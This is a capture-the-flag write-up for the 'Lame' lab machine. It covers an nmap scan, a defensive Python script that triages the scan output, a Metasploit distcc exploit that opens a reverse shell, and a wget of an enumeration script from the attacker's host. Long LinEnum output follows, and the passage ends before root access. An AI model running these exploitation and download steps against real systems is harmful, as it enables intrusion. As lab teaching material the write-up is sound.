[HTB] Lame

Today we are going to hack the HTB machine called Lame. It is rated as easy.

Enumeration


To start, we run an nmap scan to see which ports are open.

sml@m0nikE:~$ nmap -A -p- -Pn 10.10.10.3
Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-02 14:52 CET
Nmap scan report for 10.10.10.3
Host is up (0.043s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
|_smb-security-mode: ERROR: Script execution failed (use -d to debug)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 156.32 seconds

We see several open ports. The most "exotic" one is 3632/tcp, which corresponds to the distccd service, and after a quick search we find that an exploit exists for this service.
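Before moving on to the exploit, it is worth turning the scan into something a defender can act on. The following Python script, added here and not part of the original writeup, parses Nmap's normal output (the port table plus the NSE script lines attached to each port) and reports the exposures visible above: anonymous FTP, plaintext FTP, and a distcc daemon reachable from the network. The sample input is constructed from the scan output above; the `EXPOSED_SERVICES` table and the wording of the findings are the example's own.

```python
import re

# Constructed sample: the port table from the Nmap scan above, embedded so the
# script runs offline.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
"""

# One port-table row: "21/tcp   open  ftp         vsftpd 2.3.4"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")


def parse_nmap(text):
    """Parse Nmap 'normal' output into one dict per port.

    NSE script lines (those starting with '|') are attached to the port
    entry that precedes them, which is how Nmap prints them.
    """
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append({
                "port": int(m.group(1)),
                "proto": m.group(2),
                "state": m.group(3),
                "service": m.group(4),
                "version": m.group(5).strip(),
                "scripts": [],
            })
        elif line.startswith("|") and ports:
            ports[-1]["scripts"].append(line.lstrip("|_ ").rstrip())
    return ports


# Services that should not be reachable from an untrusted network at all,
# with the reason a reviewer would give. Exposure itself is the finding;
# this table (the example's own) deliberately does not check versions.
EXPOSED_SERVICES = {
    "distccd": "distcc compiler daemon accepts jobs from any client; "
               "restrict it with --allow or firewall the port",
}


def triage(ports):
    """Return human-readable findings a hardening review would raise."""
    findings = []
    for p in ports:
        if p["state"] != "open":
            continue
        label = f"{p['port']}/{p['proto']}"
        if p["service"] in EXPOSED_SERVICES:
            findings.append(f"{label}: {EXPOSED_SERVICES[p['service']]}")
        for s in p["scripts"]:
            # ftp-anon reports "Anonymous FTP login allowed" when it succeeds
            if s.startswith("ftp-anon:") and "allowed" in s:
                findings.append(f"{label}: anonymous FTP login is enabled")
        if p["service"] == "ftp":
            findings.append(f"{label}: FTP carries credentials and data in plain text")
    return findings


if __name__ == "__main__":
    parsed = parse_nmap(SAMPLE_SCAN)
    for p in parsed:
        print(f"{p['port']}/{p['proto']:<4} {p['service']:<12} {p['version']}")
    for f in triage(parsed):
        print("[!]", f)
```

Run it against a saved `nmap -oN` file by replacing `SAMPLE_SCAN` with the file's contents; the parser only relies on the row layout Nmap uses for the port table, so `-A` script output and service banners are handled the same way.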

Exploitation


We configure Metasploit to use an exploit against distccd.

msf5 > use exploit/unix/misc/distcc_exec
msf5 exploit(unix/misc/distcc_exec) > show options

Module options (exploit/unix/misc/distcc_exec):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
   RPORT   3632             yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.10.3
rhosts => 10.10.10.3
msf5 exploit(unix/misc/distcc_exec) > exploit

[*] Started reverse TCP double handler on 10.10.14.6:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo GtxuzicNJZBxaR0k;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "GtxuzicNJZBxaR0k\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.14.6:4444 -> 10.10.10.3:55000) at 2019-11-02 15:00:50 +0100
id
uid=1(daemon) gid=1(daemon) groups=1(daemon)

user.txt


We now have a low-privilege shell. We look for the user.txt flag.

sh-3.2$ pwd
/home
sh-3.2$ ls
ftp  makis  service  user
sh-3.2$ cd makis
cd makis
sh-3.2$ ls
user.txt
sh-3.2$ cat user.txt
69454a937d94f5f0225ea00acd2e8XXX

Privilege Escalation


We download an enumeration script (LinEnum, served from our attacking host) onto the machine.

sh-3.2$ cd /tmp
sh-3.2$ wget http://10.10.14.6/lin.sh
wget http://10.10.14.6/lin.sh
--07:09:14--  http://10.10.14.6/lin.sh
           => `lin.sh'
Connecting to 10.10.14.6:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 45,657 (45K) [application/octet-stream]

 0% [                                     ] 0             --.--K/s            
100%[====================================>] 45,657        --.--K/s             

07:09:14 (550.32 KB/s) - `lin.sh' saved [45657/45657]

Once downloaded, we run it and analyze the output.

sh-3.2$ sh lin.sh
#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# version 0.971

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Wed Oct 30 07:09:19 EDT 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008

[-] Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04"

[-] Hostname:
lame

### USER/GROUP ##########################################
[-] Current user/group info:
uid=1(daemon) gid=1(daemon) groups=1(daemon)

[-] Users that have previously logged onto the system:
Username         Port     From             Latest
root             pts/0    :0.0             Wed Oct 30 06:53:10 -0400 2019
makis            pts/1    192.168.150.100  Tue Mar 14 18:32:04 -0400 2017

[-] Who else is logged on:
 07:09:19 up 16 min,  1 user,  load average: 0.00, 0.01, 0.05
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
root     pts/0    :0.0             06:53   16:09m  0.00s  0.00s -bash

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(dhcp) gid=102(dhcp) groups=102(dhcp)
uid=102(syslog) gid=103(syslog) groups=103(syslog)
uid=103(klog) gid=104(klog) groups=104(klog)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(bind) gid=113(bind) groups=113(bind)
uid=106(postfix) gid=115(postfix) groups=115(postfix)
uid=107(ftp) gid=65534(nogroup) groups=65534(nogroup)
uid=108(postgres) gid=117(postgres) groups=117(postgres),114(ssl-cert)
uid=109(mysql) gid=118(mysql) groups=118(mysql)
uid=110(tomcat55) gid=65534(nogroup) groups=65534(nogroup)
uid=111(distccd) gid=65534(nogroup) groups=65534(nogroup)
uid=1002(service) gid=1002(service) groups=1002(service)
uid=112(telnetd) gid=120(telnetd) groups=120(telnetd),43(utmp)
uid=113(proftpd) gid=65534(nogroup) groups=65534(nogroup)
uid=114(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=115(snmp) gid=65534(nogroup) groups=65534(nogroup)
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

[-] It looks like we have some admin users:
uid=1003(makis) gid=1003(makis) groups=1003(makis),4(adm),112(admin)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
bind:x:105:113::/var/cache/bind:/bin/false
postfix:x:106:115::/var/spool/postfix:/bin/false
ftp:x:107:65534::/home/ftp:/bin/false
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
mysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/false
tomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/false
distccd:x:111:65534::/:/bin/false
service:x:1002:1002:,,,:/home/service:/bin/bash
telnetd:x:112:120::/nonexistent:/bin/false
proftpd:x:113:65534::/var/run/proftpd:/bin/false
statd:x:114:65534::/var/lib/nfs:/bin/false
snmp:x:115:65534::/var/lib/snmp:/bin/false
makis:x:1003:1003::/home/makis:/bin/sh

[-] Super user account(s):
root

[+] We can sudo without supplying a password!
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | }
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[-] Accounts that have recently used sudo:
/home/makis/.sudo_as_admin_successful

[+] We can read root's home directory!
total 80K
drwxr-xr-x 13 root root 4.0K Oct 30 06:53 .
drwxr-xr-x 21 root root 4.0K May 20  2012 ..
-rw-------  1 root root  373 Oct 30 06:53 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K Oct 30 06:53 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K Oct 30 06:53 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 Mar 14  2017 root.txt
-rw-r--r--  1 root root  118 Oct 30 06:53 vnc.log

[-] Are permissions on /home directories lax:
total 24K
drwxr-xr-x  6 root    root    4.0K Mar 14  2017 .
drwxr-xr-x 21 root    root    4.0K May 20  2012 ..
drwxr-xr-x  2 root    nogroup 4.0K Mar 17  2010 ftp
drwxr-xr-x  2 makis   makis   4.0K Mar 14  2017 makis
drwxr-xr-x  2 service service 4.0K Apr 16  2010 service
drwxr-xr-x  3    1001    1001 4.0K May  7  2010 user

[-] Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
[-] Environment information:
_DISTCC_SAFEGUARD=1
TERM=linux
QUIET=no
PATH=/sbin:/bin:/usr/sbin:/usr/bin
runlevel=2
RUNLEVEL=2
UPSTART_EVENT=runlevel
PWD=/tmp
VERBOSE=no
previous=N
PREVLEVEL=N
SHLVL=7
UPSTART_JOB=rc2
UPSTART_JOB_ID=5
_=/usr/bin/env

[-] Path information:
/sbin:/bin:/usr/sbin:/usr/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

[-] Current umask value:
u=rwx,g=rx,o=rx
0022

[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root  724 Apr  8  2008 /etc/crontab
/etc/cron.d:
total 20
drwxr-xr-x  2 root root 4096 May 14  2012 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rw-r--r--  1 root root  492 Jan  6  2010 php5
-rw-r--r--  1 root root 1323 Mar 31  2008 postgresql-common

/etc/cron.daily:
total 60
drwxr-xr-x  2 root root 4096 Apr 28  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  633 Feb  1  2008 apache2
-rwxr-xr-x  1 root root 7441 Apr 22  2008 apt
-rwxr-xr-x  1 root root  314 Apr  4  2008 aptitude
-rwxr-xr-x  1 root root  502 Dec 12  2007 bsdmainutils
-rwxr-xr-x  1 root root   89 Jun 19  2006 logrotate
-rwxr-xr-x  1 root root  954 Mar 12  2008 man-db
-rwxr-xr-x  1 root root  183 Mar  8  2008 mlocate
-rwxr-xr-x  1 root root  383 Apr 28  2010 samba
-rwxr-xr-x  1 root root 3295 Apr  8  2008 standard
-rwxr-xr-x  1 root root 1309 Nov 23  2007 sysklogd
-rwxr-xr-x  1 root root  477 Dec  7  2008 tomcat55

/etc/cron.hourly:
total 12
drwxr-xr-x  2 root root 4096 Mar 16  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x  2 root root 4096 Apr 28  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  664 Feb 20  2008 proftpd
-rwxr-xr-x  1 root root  129 Apr  8  2008 standard

/etc/cron.weekly:
total 24
drwxr-xr-x  2 root root 4096 Mar 16  2010 .
drwxr-xr-x 95 root root 4096 Oct 30 06:52 ..
-rw-r--r--  1 root root  102 Apr  8  2008 .placeholder
-rwxr-xr-x  1 root root  528 Mar 12  2008 man-db
-rwxr-xr-x  1 root root 2522 Jan 28  2008 popularity-contest
-rwxr-xr-x  1 root root 1220 Nov 23  2007 sysklogd

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING  ##########################################
[-] Network and IP info:
eth0      Link encap:Ethernet  HWaddr 00:50:56:b9:86:fb  
          inet addr:10.10.10.3  Bcast:10.10.10.255  Mask:255.255.255.0
          inet6 addr: dead:beef::250:56ff:feb9:86fb/64 Scope:Global
          inet6 addr: fe80::250:56ff:feb9:86fb/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:134051 errors:0 dropped:0 overruns:0 frame:0
          TX packets:635 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:9969857 (9.5 MB)  TX bytes:75030 (73.2 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:229 errors:0 dropped:0 overruns:0 frame:0
          TX packets:229 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:87089 (85.0 KB)  TX bytes:87089 (85.0 KB)

[-] ARP history:
? (10.10.10.2) at 00:50:56:B9:B5:67 [ether] on eth0

[-] Nameserver(s):
nameserver 10.10.10.2

[-] Default route:
default         10.10.10.2      0.0.0.0         UG    100    0        0 eth0

[-] Listening TCP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:512             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:513             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:2049            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:514             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:50086           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:46150           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8009            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6697            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1099            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:48910           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8787            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:8180            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:1524            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -
tcp        0      0 10.10.10.3:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:5432            0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:25              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:953           0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:45246           0.0.0.0:*               LISTEN      -
tcp6       0      0 :::2121                 :::*                    LISTEN      -
tcp6       0      0 :::3632                 :::*                    LISTEN      -
tcp6       0      0 :::53                   :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::5432                 :::*                    LISTEN      -
tcp6       0      0 ::1:953                 :::*                    LISTEN      -

[-] Listening UDP:
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 0.0.0.0:2049            0.0.0.0:*                           -
udp        0      0 10.10.10.3:137          0.0.0.0:*                           -
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -
udp        0      0 10.10.10.3:138          0.0.0.0:*                           -
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -
udp        0      0 0.0.0.0:58001           0.0.0.0:*                           -
udp        0      0 0.0.0.0:49939           0.0.0.0:*                           -
udp        0      0 127.0.0.1:161           0.0.0.0:*                           -
udp        0      0 0.0.0.0:54187           0.0.0.0:*                           -
udp        0      0 10.10.10.3:53           0.0.0.0:*                           -
udp        0      0 127.0.0.1:53            0.0.0.0:*                           -
udp        0      0 0.0.0.0:33468           0.0.0.0:*                           -
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -
udp        0      0 0.0.0.0:1018            0.0.0.0:*                           -
udp6       0      0 :::53                   :::*                                -
udp6       0      0 :::44491                :::*                                -

### SERVICES #############################################
[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.3   2844  1692 ?        Ss   06:52   0:00 /sbin/init
root         2  0.0  0.0      0     0 ?        S<   06:52   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S<   06:52   0:00 [migration/0]
root         4  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   06:52   0:00 [watchdog/0]
root         6  0.0  0.0      0     0 ?        S<   06:52   0:00 [events/0]
root         7  0.0  0.0      0     0 ?        S<   06:52   0:00 [khelper]
root        41  0.0  0.0      0     0 ?        S<   06:52   0:00 [kblockd/0]
root        64  0.0  0.0      0     0 ?        S<   06:52   0:00 [kseriod]
root       181  0.0  0.0      0     0 ?        S    06:52   0:00 [pdflush]
root       182  0.0  0.0      0     0 ?        S    06:52   0:00 [pdflush]
root       183  0.0  0.0      0     0 ?        S<   06:52   0:00 [kswapd0]
root       224  0.0  0.0      0     0 ?        S<   06:52   0:00 [aio/0]
root      1244  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksnapd]
root      1433  0.0  0.0      0     0 ?        S<   06:52   0:00 [ata/0]
root      1436  0.0  0.0      0     0 ?        S<   06:52   0:00 [ata_aux]
root      1445  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_0]
root      1449  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_1]
root      1462  0.0  0.0      0     0 ?        S<   06:52   0:00 [ksuspend_usbd]
root      1466  0.0  0.0      0     0 ?        S<   06:52   0:00 [khubd]
root      2330  0.0  0.0      0     0 ?        S<   06:52   0:00 [scsi_eh_2]
root      2513  0.0  0.0      0     0 ?        S<   06:52   0:00 [kjournald]
root      2688  0.0  0.1   2216   648 ?        S<  06:52   0:00 /sbin/udevd --daemon
root      3057  0.0  0.0      0     0 ?        S<   06:52   0:00 [kpsmoused]
root      3997  0.0  0.0      0     0 ?        S<   06:52   0:00 [kjournald]
daemon    4216  0.0  0.1   1836   524 ?        Ss   06:52   0:00 /sbin/portmap
statd     4234  0.0  0.1   1900   724 ?        Ss   06:52   0:00 /sbin/rpc.statd
root      4240  0.0  0.0      0     0 ?        S<   06:52   0:00 [rpciod/0]
root      4255  0.0  0.1   3648   560 ?        Ss   06:52   0:00 /usr/sbin/rpc.idmapd
root      4482  0.0  0.0   1716   492 tty4     Ss+  06:52   0:00 /sbin/getty 38400 tty4
root      4484  0.0  0.0   1716   484 tty5     Ss+  06:52   0:00 /sbin/getty 38400 tty5
root      4490  0.0  0.0   1716   488 tty2     Ss+  06:52   0:00 /sbin/getty 38400 tty2
root      4494  0.0  0.0   1716   488 tty3     Ss+  06:52   0:00 /sbin/getty 38400 tty3
root      4497  0.0  0.0   1716   492 tty6     Ss+  06:52   0:00 /sbin/getty 38400 tty6
syslog    4533  0.0  0.1   1936   648 ?        Ss   06:52   0:00 /sbin/syslogd -u syslog
root      4584  0.0  0.1   1872   544 ?        S    06:52   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
klog      4586  0.0  0.4   3288  2120 ?        Ss   06:52   0:00 /sbin/klogd -P /var/run/klogd/kmsg
bind      4611  0.0  1.4  35408  7680 ?        Ssl  06:52   0:00 /usr/sbin/named -u bind
root      4635  0.0  0.1   5312  1024 ?        Ss   06:52   0:00 /usr/sbin/sshd
root      4716  0.0  0.2   2768  1304 ?        S    06:52   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4758  0.0  3.3 127560 17024 ?        Sl   06:52   0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4760  0.0  0.1   1700   560 ?        S    06:52   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
postgres  4839  0.0  0.9  41340  5068 ?        S    06:52   0:00 /usr/lib/postgresql/8.3/bin/postgres -D /var/lib/postgresql/8.3/main -c config_file=/etc/postgresql/8.3/main/postgresql.conf
postgres  4843  0.0  0.2  41340  1376 ?        Ss   06:52   0:00 postgres: writer process
postgres  4844  0.0  0.2  41340  1188 ?        Ss   06:52   0:00 postgres: wal writer process
postgres  4845  0.0  0.2  41476  1404 ?        Ss   06:52   0:00 postgres: autovacuum launcher process
postgres  4846  0.0  0.2  12660  1152 ?        Ss   06:52   0:00 postgres: stats collector process
daemon    4866  0.0  0.0   2316   424 ?        SNs  06:52   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
daemon    4867  0.0  0.1   2316   556 ?        SN   06:52   0:00 distccd --daemon --user daemon --allow 0.0.0.0/0
root      4921  0.0  0.0      0     0 ?        S    06:52   0:00 [lockd]
root      4922  0.0  0.0      0     0 ?        S<   06:52   0:00 [nfsd4]
root      4923  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4924  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4925  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4926  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4927  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4928  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4929  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4930  0.0  0.0      0     0 ?        S    06:52   0:00 [nfsd]
root      4934  0.0  0.0   2424   328 ?        Ss   06:52   0:00 /usr/sbin/rpc.mountd
root      5002  0.0  0.3   5412  1724 ?        Ss   06:52   0:00 /usr/lib/postfix/master
postfix   5003  0.0  0.3   5420  1644 ?        S    06:52   0:00 pickup -l -t fifo -u -c
postfix   5006  0.0  0.3   5460  1684 ?        S    06:52   0:00 qmgr -l -t fifo -u
root      5010  0.0  0.2   5388  1192 ?        Ss   06:52   0:00 /usr/sbin/nmbd -D
root      5012  0.0  0.2   7724  1476 ?        Ss   06:52   0:00 /usr/sbin/smbd -D
root      5016  0.0  0.1   7724   808 ?        S    06:52   0:00 /usr/sbin/smbd -D
snmp      5018  0.0  0.7   8488  3760 ?        S    06:52   0:00 /usr/sbin/snmpd -Lsd -Lf /dev/null -u snmp -I -smux -p /var/run/snmpd.pid 127.0.0.1
